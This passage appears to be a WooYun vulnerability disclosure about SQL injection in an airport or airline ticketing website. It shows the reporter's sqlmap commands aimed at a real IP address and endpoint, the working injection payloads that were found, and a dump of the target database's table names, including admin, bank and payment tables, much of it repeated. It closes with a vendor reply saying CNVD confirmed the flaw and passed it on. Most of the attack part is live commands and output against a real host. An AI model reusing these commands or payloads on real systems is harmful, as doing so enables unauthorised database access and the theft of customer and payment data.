__VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634
然后直接sqlmap上
随便找了一个
Database: AirportTest                                                          
[460 tables]
+-------------------------+
| Airline                 |
| Airline                 |
| Airline                 |
| Airline                 |
| Airline                 |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillType                |
| BillType                |
| BillType                |
| BillType                |
| BillType                |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| City                    |
| City                    |
| City                    |
| City                    |
| City                    |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| Department              |
| Department              |
| Department              |
| Department              |
| Department              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderState              |
| OrderState              |
| OrderState              |
| OrderState              |
| OrderState              |
| Payforment              |
| Payforment              |
| Payforment              |
| Payforment              |
| Payforment              |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| U1                      |
| U1                      |
| U1                      |
| U1                      |
| U1                      |
| Unit                    |
| Unit                    |
| Unit                    |
| Unit                    |
| Unit                    |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| keys                    |
| keys                    |
| keys                    |
| keys                    |
| keys                    |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| syssegments             |
| syssegments             |
| syssegments             |
| syssegments             |
| syssegments             |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
+-------------------------+
[11:38:00] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/60.191.78.34'
[*] shutting down at 11:38:00
root@hughlvan:/# sqlmap -u "http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE2MzEzMzk3NjJkZA%3D%3D&btnEdit=%E6%8F%90%20%E4%BA%A4&__EVENTVALIDATION=%2FwEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634" 
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:24
[11:45:24] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:45:24] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: tbOrderID
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; IF(6687=6687) SELECT 6687 ELSE DROP FUNCTION sthL--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' AND 3469=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3469=3469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113))) AND 'bngz'='bngz
    Type: UNION query
    Title: Generic UNION query (NULL) - 41 columns
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+CHAR(105)+CHAR(117)+CHAR(84)+CHAR(75)+CHAR(116)+CHAR(68)+CHAR(86)+CHAR(67)+CHAR(65)+CHAR(109)+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' WAITFOR DELAY '0:0:5'--
---
[11:45:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:45:25] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/60.191.78.34'
[*] shutting down at 11:45:25
root@hughlvan:/# sqlmap -u "http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE2MzEzMzk3NjJkZA%3D%3D&btnEdit=%E6%8F%90%20%E4%BA%A4&__EVENTVALIDATION=%2FwEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634" -D AirportTest --table
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:46:25
[11:46:26] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:46:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: tbOrderID
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; IF(6687=6687) SELECT 6687 ELSE DROP FUNCTION sthL--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' AND 3469=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3469=3469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113))) AND 'bngz'='bngz
    Type: UNION query
    Title: Generic UNION query (NULL) - 41 columns
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+CHAR(105)+CHAR(117)+CHAR(84)+CHAR(75)+CHAR(116)+CHAR(68)+CHAR(86)+CHAR(67)+CHAR(65)+CHAR(109)+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' WAITFOR DELAY '0:0:5'--
---
[11:46:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:46:26] [INFO] fetching tables for database: AirportTest
[11:46:26] [INFO] the SQL query used returns 92 entries
Database: AirportTest                                                          
[460 tables]
+-------------------------+
| Airline                 |
| Airline                 |
| Airline                 |
| Airline                 |
| Airline                 |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillType                |
| BillType                |
| BillType                |
| BillType                |
| BillType                |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| City                    |
| City                    |
| City                    |
| City                    |
| City                    |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| Department              |
| Department              |
| Department              |
| Department              |
| Department              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderState              |
| OrderState              |
| OrderState              |
| OrderState              |
| OrderState              |
| Payforment              |
| Payforment              |
| Payforment              |
| Payforment              |
| Payforment              |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| U1                      |
| U1                      |
| U1                      |
| U1                      |
| U1                      |
| Unit                    |
| Unit                    |
| Unit                    |
| Unit                    |
| Unit                    |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| keys                    |
| keys                    |
| keys                    |
| keys                    |
| keys                    |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| syssegments             |
| syssegments             |
| syssegments             |
| syssegments             |
| syssegments             |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
+-------------------------+
网速不行 就不深入。
 
修复方案:
你懂得
版权声明:转载请注明来源 weird0@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-02-06 15:20
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向民航局测评中心通报,由其后续协调网站管理部门处置。
最新状态:
暂无

 
                 
                        
